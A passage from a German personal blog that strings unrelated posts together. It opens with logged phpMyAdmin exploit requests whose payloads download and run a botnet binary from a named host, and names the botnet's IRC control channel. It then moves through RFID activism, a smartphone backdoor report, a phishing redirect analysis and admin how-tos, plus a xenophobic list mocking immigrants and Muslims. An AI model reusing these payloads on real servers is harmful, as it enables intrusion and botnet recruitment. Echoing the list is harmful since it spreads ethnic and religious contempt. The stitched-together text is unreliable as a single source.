50.56.100.212 “GET /phpMyAdmin/config/config.inc.php?eval=system(‘echo cd /tmp;wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl;curl -O wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl;lyxn -DUMP wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl’);

50.56.100.212 “GET /phpMyAdmin/index.php?session_to_unset=123&token=55015535aXXXX04379704f9&_SESSION[!bla]=%7Cxxx%7Ca%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA_Config%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A51%3A%22%2Fvar%2Flib%2Fphp5%2Fsess_ivsf8dr16jc9aqssmo0gft26dledmmi4%22%3B%7D%7D&_SESSION[payload]=%3C%3Fphp+%0Aecho+exec%28%27cd+%2Ftmp%3Bwget+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+exec%28%27cd+%2Ftmp%3Bcurl+-O+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+exec%28%27cd+%2Ftmp%3Bfetch+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+exec%28%27cd+%2Ftmp%3Blwp-download+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+exec%28%27cd+%2Ftmp%3Blynx+-DUMP+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0A%0Aecho+passthru%28%27cd+%2Ftmp%3Bwget+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+passthru%28%27cd+%2Ftmp%3Bcurl+-O+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+passthru%28%27cd+%2Ftmp%3Bfetch+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+passthru%28%27cd+%2Ftmp%3Blwp-download+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+passthru%28%27cd+%2Ftmp%3Blynx+-DUMP+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0A%0Aecho+system%28%27cd+%2Ftmp%3Bwget+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+system%28%27cd+%2Ftmp%3Bcurl+-O+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+system%28%27cd+%2Ftmp%3Bfetch+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+system%28%27cd+%2Ftmp%3Blwp-download+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+system%28%27cd+%2Ftmp%3Blynx+-DUMP+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0A%0Aecho+shell_exec%28%27cd+%2Ftmp%3Bwget+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+shell_exec%28%27cd+%2Ftmp%3Bcurl+-O+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+shell_exec%28%27cd+%2Ftmp%3Bfetch+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+shell_exec%28%27cd+%2Ftmp%3Blwp-download+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0Aecho+shell_exec%28%27cd+%2Ftmp%3Blynx+-DUMP+http%3A%2F%2Fsexday.in%2F%7Eadminplus%2Fsrfl.jpg%3Btar+xzvf+srfl.jpg%3Bchmod+%2Bx+sfrl%3B.%2Fsfrl%27%29%3B%0A%0A%0A%3F%3E HTTP/1.1″

Wie man sehen kann wir hier Schadsoftware installiert und diese ist fuer ein Botnet gedacht. Hier werden SSH Bruteforces und DDoS Attacken gestartet. Eine weitere Analyse zeigte unter /tmp/kks einen IRC Bot welcher sich in das Netz:
ircd1.hackplanet.info 6667 auf den Steuerchannel: #hexori
einwaehlt.
Hier lauern aktuell ueber 300 Drohnen. Stetig steigend.

Die Massnahmen sollten klar sein, phpmyadmin updaten und Einbruchsspuren checken.
Verwundbar sind mind folgende Versionen: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7 und fuer den anderen Exploit: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1

Mit einer spektakulären Aktion vor dem Gerry-Weber-Store in Bielefeld
weist der FoeBuD auf die unsichtbare Gefahr hin

Fotos dazu finden sich auf unserer Website:
http://tinyurl.com/Fotos-von-StopRFID-Aktion

Sendung MARKT (WDR) berichtet

Angekündigt ist der Beitrag für
Montags, 16.1.2012, 21.00 Uhr – 21.45 Uhr, WDR FERNSEHEN
(Wiederholung: Mittwoch 18.1.2012, 14.15 Uhr – 15.00 Uhr)

Die Firma Gerry Weber geht mit schlechtem Beispiel voran: Seit einiger
Zeit sind RFID-Schnüffelchips in alle Kleidungsstücke der Firma
eingenäht. Der Chip verbirgt sich im Textilpflegeetikett und kann auf
eine Entfernung von acht Metern poer Funk ausgelesen werden. Was zur
Optimierung der Logistik gedacht ist, wird zur Gefahr für Kundinnen
und Kunden, wenn es in der Kleidung bleibt: Wo immer ein
entsprechendes Lesegerät angebracht ist, werden – unbemerkbar – die
Daten der Chips ausgelesen – und wiedererkannt.

Das machte der FoeBuD bei einer spektakulären Aktion deutlich: Die
Aktiven lasen mittels eines handelsüblichen Lesegerätes die
versteckten Chips in der Kleidung von Gerry-Weber-Kundinnen aus und
projizierten die Inhalte für alle lesbar auf eine überdimensionale
Sprechblase. Viele Passantinnen und Passanten fragten neugierig nach
und wurden von den FoeBuD-Aktiven über RFID in Kleidung aufgeklärt.

Eine vorübergehende Passantin mit einer Jacke der Modemarke Peuterey
wurde ebenfalls von dem Lesegerät erfaßt. Sie war entsetzt, dass ihre
vor über einem Jahr gekaufte Jacke mit einem Schnüffelchip verwanzt
ist. Bisher hatte sie niemand darüber aufgeklärt. Mit der im Chip
vorhandenen Produkt- und Seriennummer ist sie jederzeit von jedem
Lesegerät wiedererkennbar. Ihrem verständlichen Unmut darüber
artikulierte sie direkt vor laufender Kamera. Peuterey bekam für
diesen Umgang mit Schnüffelchips bereits im April 2011 einen
BigBrotherAward.

Der herbei geeilte Firmenchef Gerhard Weber zeigte sich wenig
informiert über die Risiken und Nebenwirkungen für Kundinnen und
Kunden, die seine Kleidung kaufen sollen.

Der FoeBuD fordert erstens, sämtliche Funketiketten an der Kasse oder
vor dem Versand physikalisch zu entfernen und zweitens eine
entsprechende verpflichtende Gesetzgebung auf EU-Ebene.

Die ARD-Sendung “Markt” sendet zum Thema RFID-Chips in Textilien am
Montag, 16.1.2012 ab 21 Uhr einen Beitrag, der bei der Aktion vor Ort,
beim FoeBuD e.V., Gerry Weber und weiteren Orten gedreht wurde.
(Angekündigter Sendetermin)

Was können Sie tun?

- Sind Sie Kundin oder Kunde von Gerry Weber? Sprechen Sie das Thema im
Laden an! Fragen Sie nach den Chips – Sie werden erstaunt sein, wie
wenig die Verkäuferinnen darüber wissen. Verlangen Sie, dass die Chips
herausgeschnitten werden. Oder boykottieren Sie die Firma Gerry Weber,
bis sie sich unseren Forderungen beugt.

- Sprechen Sie mit Ihrem Europa- und Bundestagsabgeordneten über die
Gefahren von RFID.

- Bringen Sie Ihre Vorbehalte dort zu Gehör.

- Unterstützen Sie die Arbeit des FoeBuD gegen Schnüffelchips mit einer Spende:
Spendenkonto: 2129799 Sparkasse Bielefeld (BLZ 480 501 61)

Links:

BigBrotherAward 2011 an die Firma Peuterey (Agentur Torsten Müller, Düsseldorf)
http://www.bigbrotherawards.de/2011/.tec

Bildmaterial finden Sie (in Kürze) auf der Website des FoeBuD
https://www.foebud.org

Website WDR MARKT
http://www.wdr.de/tv/markt/

Website Gerry Weber zu RFID
http://www.gerryweber….

Website Peuterey
http://www.peuterey.it/eng_index.html

Aussage des Marketingssprechers von Alien Technology zur Reichweite (12.8 m)
http://globaltrendasia.com/…

Meldung, dass G&P (Marke Peuterey) Alien Technology Chips verwendet (Higgs™-3 based inlays)
http://www.rfidglobal.org/news/2009-07/20090708162105987.html

Eine bodenlose Frechheit was hier geschieht.

EDIT: Wie ich gerade hoere ist C&A auch mit von der Partie und versteckt 2cm grosse Schnueffelchips in Kleidungsstuecken. Danke A. Dollmaier fuer die Info.

Downloadlink: ICS UI Mod

Nachdem indische Hacker, die sich “Lords of Dharmaraja” nennen, letzte Woche nach eigenen Angaben Teile des Quellcodes von Symantecs “Norton Antivirus” veröffentlichten, legen sie nun brisante Informationen nach:

So sollen laut geleakten indischen Regierungsdokumenten die Smartphone-Hersteller Research in Motion (RIM), Nokia und Apple in ihre Smartphones eine Backdoor eingebaut haben, die es der Regierung ermöglich, die Nutzer der Handys zu überwachen. Beigelegt wurden Protokolle von internem E-Mail-Verkehr der United States-China Economic and Security Review Commission (USCC) sowie eine Abwesenheitsmeldung des russischen Botschafters in Canberra.

Offenbar ist es dem indischen Militär also nicht nur möglich, die Telefone von Mitarbeitern ausländischer Firmen zu überwachen. Die Überwachung wird im Rahmen staatlicher Industriespionage bereits konkret durchgeführt.

Indiens Kommunikationsminister Kapil Sibal erregte zuletzt Anfang Dezember Aufmerksamkeit, als er eine Vorabüberprüfung aller Social-Media-Inhalte forderte und damit den Unmut der Netzgemeinde auf sich zog.

Quelle: Netzpolitik.org

Schoen zu lesen das Android (mal wieder) verschont bleibt von derartigen Massnahmen, auch wenig verwundertlich bei einem OpenSource Projekt.

Update: angeblich soll die Geschichte eine Ente sein, zumindest behaupten das Nokia und Apple, es gaebe keine Backdoor. Blackberry haelt sich dezent zurueck: iphonehacks.com


curl -I dummypage.tld
HTTP/1.1 302 Found
Date: Thu, 05 Jan 2012 09:13:32 GMT
Server: Apache/2.2.XX
Location: http://yumXXch.com/in.cgi?7
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1


yumXXch.com… leitet dann auf die eigentliche Phishingseite um und scheint hier auch noch zwischen Opera Mobile und anderen Browser zu unterscheiden, denn wir landeten bei den Tests immer auf unterschiedlichen Seiten. Opera immer auf einem Webshop mit illegalen Inhalten und die anderen Browser immer auf einer Seite um einfach von zu Hause aus Geld zu verdienen.
Die Idee ist verdammt simpel aber in meinen Augen auch einfach genial und auf den ersten Blick kaum zu sehen erst wenn man tiefer graebt sieht man das hier ueberhaupt etwas vorgeht, es sei denn einem steht Komissar Zufall zur Seite so wie beim Kunden, der seine Seite mit dem IPhone pruefen wollte.
Im vorliegenden Fall war die Weiterleitung nicht auf Fileebene zu finden sondern in einer Typo3 Funktion und somit in der Datenbank versteckt.
Kein offensichtliches JavaScript oder base64 “encoded” File auf Fileebene zu sehen. Hier hat sich jemand mit einfachen Mitteln zu einer doch gut versteckten Weiterleitung gemacht.

Wenn Ihr wirklich etwas erleben möchtet, bereitet Euch doch mal auf ein Abenteuer vor, wie Ihr es Euch niemals hättet vorstellen können:

1. Geht illegal nach Pakistan, Afghanistan, Marokko, in die Türkei oder in den Irak

2. Sorgt euch nicht um Visa, internationale Gesetze, Immigrationsregeln
… oder andere, ähnlich lächerliche Vorschriften

3. Wenn ihr dort angekommen seid, fordert umgehend von der lokalen Behörde eine kostenlose medizinische Versorgung für Euch und Eure ganze Familie

4. Besteht darauf, dass alle Mitarbeiter bei der Krankenkasse mind. Ruhrpottdeutsch, Platt oder Bayerisch sprechen und dass die Kliniken Euer Essen nur so zubereiten, wie Ihr es aus Deutschland gewohnt seid

5. Besteht darauf, dass alle Formulare, Anfragen und andere Dokumente in Eure Sprache übersetzt werden

6. Weist Kritik an eurem Verhalten empört zurück indem ihr ausdrücklich betont: “Das hat mit meiner Kultur und Religion zu tun; davon versteht Ihr nichts”

7. Behaltet unbedingt eure ursprüngliche Identität. Hängt eine deutsche Fahne ans Fenster (am Auto geht es natürlich auch, vergesst das nicht)

8. Sprecht sowohl zu Hause als auch anderswo nur deutsch und sorgt dafür, dass auch Eure Kinder sich ähnlich verhalten

9. Fordert unbedingt, dass an Musikschulen deutsche Volksmusik und Fahnenschwingen unterrichtet wird

10. Verlangt sofort und bedingungslos einen Führerschein, eine Aufenthaltsgenehmigung und was Euch sonst noch so einfällt

11. Betrachtet den Besitz dieser Dokumente als eine Rechtfertigung Eurer illegalen Präsenz in Pakistan, Afghanistan oder im Irak

12. Lasst euch nicht diskriminieren, besteht auf euer gutes Recht und verlangt Kindergeld

13. Fahrt ohne Autoversicherung; die ist nur für Einheimische erforderlich

14. Besteht darauf, dass Beamte, Polizisten, Gerichte Euch höflich behandeln und respektieren, sonst organisiert Protestzüge gegen Euer Gastland und dessen Einwohner. Unterstützt ausnahmslos Gewalt gegen Nicht-Weiße, Nicht-Christen und gegen eine Regierung, die euch ins Land gelassen hat

15. Verlangt, dass sich Eure Frau (auch wenn ihr euch inzwischen 4 davon angeschafft habt) nicht vermummen und keine Burka tragen muss

VIEL GLÜCK WÜNSCHE ICH EUCH DABEI! IN DEUTSCHLAND IST DAS ALLES MÖGLICH!

ich moechte Euch auf diesem Weg ein gesundes neues Jahr wuenschen, auf das naechstes Jahr ein wenig weniger turbulent wird als das vorgehende, waren in meinen Augen doch ein wenig zuviele Katastrophen, Downratings, Kriege und Leid in aller Welt, hoffen wir das beste.

In dem Sinne bis naechstes Jahr und sprengt Euch nicht selbst in die Luft und bitte auch nicht den ungeliebten Nachbarn.

LG
Milan aka t4c

#! /bin/bash
echo "opening luks"
ssh user@host 'cryptsetup luksOpen /dev/sdXY backup <<<PASSWORT'
echo "mounting /backup"
ssh user@host 'mount /dev/mapper/backup /backup'
echo "running rsync"
rsync -avcz -e ssh --progress --exclude-from=/etc/rsyncxlude /* user@host:/backup/
echo "starting umount"
ssh user@host 'cryptsetup luksClose backup'
ssh user@host 'umount /backup/'
echo "have a nice day!"


Und das excludefile (/etc/rsyncxlude):

/sys/*
/tmp/*
/proc/*
/backup/
/usr/src/*

PS: Danke an bofHeidelberg fuer den kleinen Denkanstoss.
PPS: Danke @saerious… heute ist der Fehlermurphy anwesend

Die Deutsche Bank droht mit rechtlichen Schritten und Schadenersatzklage gegen einen Film über Nahrungsmittelspekulationen, sollte nicht eine Passage des Pressesprechers Frank Hartmann herausgenommen werden. Der Pressesprecher wird dahingehend zusammengefasst, dass nicht die Händler von Banken, sondern die Menschen in Somalia für ihre Armut selbst verantwortlich seien. Daraufhin bestätigt Hartmann: „Natürlich sind die selbst schuld!“

Der Aussage, Menschen in Somalia seien selbst schuld, sich die überhöhten Getreidepreise nicht leisten zu können, droht nun Zensur. Die Deutsche Bank hat angekündigt, Strafantrag wegen Verletzung des § 201 StGB zu stellen und den Film per 19.12.2011 zu verbieten. Der Leiter der Rechtsabteilung der Deutschen Bank fordert mit Schreiben vom 14. Dezember 2011, „die weitere Verbreitung und Vorführung des Interviews von Herrn Hartmann in dem Film zu unterlassen.” Die Deutsche Bank behauptet, der Pressesprecher habe ein “vertrauliches Hintergrundgespräch zu Ihrer persönlichen Information” geführt, das nicht für die Öffentlichkeit bestimmt gewesen sei. Der Kameramann des Films, Firas Sabbagh, erklärt: „Der Deutschen Bank ist peinlich, was ihr Pressesprecher gegenüber dem Zentrum für Politische Schönheit öffentlich erklärt hat. Frank Hartmann wurde darüber aufgeklärt, dass das Gespräch aufgezeichnet wird.” – Auch die CSR-Abteilung der Deutschen Bank, aufgescheucht von der Passage, die nicht so recht ins Bild sozialer Verantwortung passen will, bot Gespräche an. Jetzt droht die Bank, sich an der Freiheit der Kunst zu schaffen zu machen.

Die Bank war zuletzt wegen des Foodwatch-Berichts “Die Hungermacher” stark in die Kritik geraten. 2010 sollen laut Weltbank aufgrund gestiegener Nahrungsmittelpreise über 40 Millionen Menschen in die absolute Armut getrieben worden sein. Josef Ackermann erklärte einen Tag nach der Veröffentlichung des Berichts, die Sachlage zu prüfen. In einem persönlichen Brief an Foodwatch meinte Ackermann: „Kein Geschäft ist es wert, den guten Ruf der Deutschen Bank aufs Spiel zu setzen.“ – Laut Pressestelle der Bank war auch Ackermanns Brief nicht für die Öffentlichkeit bestimmt gewesen. Auch damals zeigte sich die Bank ungehalten über eine vermeintlich nichtintendierte Veröffentlichung. Nina van Bergen vom Zentrum für Politische Schönheit (ZPS): „Die Kritik ist seit Jahren bekannt. Aber erst jetzt, als das Interesse der Öffentlichkeit an den Spekulationsgeschäften, die gegen alle ethischen und moralischen Grundsätze verstoßen, enorm zunimmt, verfallen die Bank in hektische Aktivität. Als bräuchte sie einen Bericht, um Kritik überhaupt wahrzunehmen?“ Ein Mitarbeiter der CSR-Abteilung der Deutschen Bank unterbreitete dem ZPS das Angebot, nach Prüfung der Kritik an den Spekulationsgeschäften Ende Januar „zu reden“. Dazu erklärt Philipp Ruch, künstlerischer Leiter des Zentrums für Politische Schönheit: „Das scheint die übliche Masche zu sein. Es gibt nichts zu reden. Die Bank muss sofort handeln. Was haben hunderte Mitarbeiter beim Spekulationsgeschäft mit Weizen, Mais und Zucker verloren? Es geht um Millionen Menschen. Man hätte von Anfang an viel vorsichtiger sein müssen.“
Quelle: Pressemitteilung Poltical Beauty

Ich persoenlich finde das Video laesst doch relativ blicken und regt zum Nachdenken an und wie vieles in unserer Gesellschaft muss derartiges Material natuerlich verschwinden, aber wie sagt man so schoen?
Das Internet vergisst nie und in diesem Sinne sollte das Video auch verbreitet werden, die Moeglichkeiten hierfuer stehen uns allen offen und damit werft die Maschinerie an: Google+, Facebook, Twitter, Youtube, P2P.
Sorgt wie schon in der Vergangenheit dafuer, das Inhalte nicht einfach verschwinden koennen und das auch gut ist das sie es nicht koennen.
Hier der aktuelle Youtubelink: Schuld. Die Barbarei Europas und fuer den Fall das dieser verschwinden sollte, ein Backup auf filsh.net.
Falls beide Links dem Zensus zum Opfer fallen bitte ich um eine Nachricht, denn ich habe das komplette Video als AVI Datei gebackupped.

Nach dem emergen der Version 9.1 kopieren wir die Configfiles der Version 9.0 auf die 9.1:
cp -R /etc/postgresql-9.0/* /etc/postgresql-9.1/*

Mit dem User ‘postgres’ wird nun eine neue Datenbank erstellt:

su - posgres
initdb91 /var/lib/postgresql/9.1/data
exit

Als root User versuchen wir nun die neue Datenbank zu starten, falls die alte Version noch laeuft muss diese vorher beendet werden, wenn es zu keinen Fehlern kommt, koennen wir mit der Migration der Daten beginnen.
Zum Zeitpunkt der Migration darf keine der Datenbanken gestartet sein. Da PostgreSQL die Configfiles unter /var/lib/postgres/$VERSION/data erwartet, Gentoo diese jedoch unter /etc ablegt erstellen wir einige Symlinks:

ln -s /etc/postgresql-9.0/*.conf /var/lib/postgresql/9.0/data/
ln -s /etc/postgresql-9.1/*.conf /var/lib/postgresql/9.1/data/

Nun steht der Datenuebernahme eigentlich nichts mehr im Weg:

su - postgres
cd /var/lib/postgres
pg_upgrade91 -v --old-datadir=/var/lib/postgresql/9.0/data/ --new-datadir=/var/lib/postgresql/9.1/data --old-bindir=/usr/lib/postgresql-9.0/bin/ --new-bindir=/usr/lib/postgresql-9.1/bin/
exit

Nun testen wir den Start der Version 9.1, hier kam es bei mir zu Problemen mit Diensten wie Postfix oder Openfire welche Postgres 9.0 starten wollten.

eselect postgresql set 9.1

und das unmergen von PostgreSQL 9.0 sowie das loeschen der 9.0 init Files konnten hier Abhilfe schaffen.
Sollte nun alles laufen beherzigen wir noch den Rat von pg_upgrade91:

su - postgres
vacuumdb --all --analyze-only
rm -rf /var/lib/postgresql/9.0
exit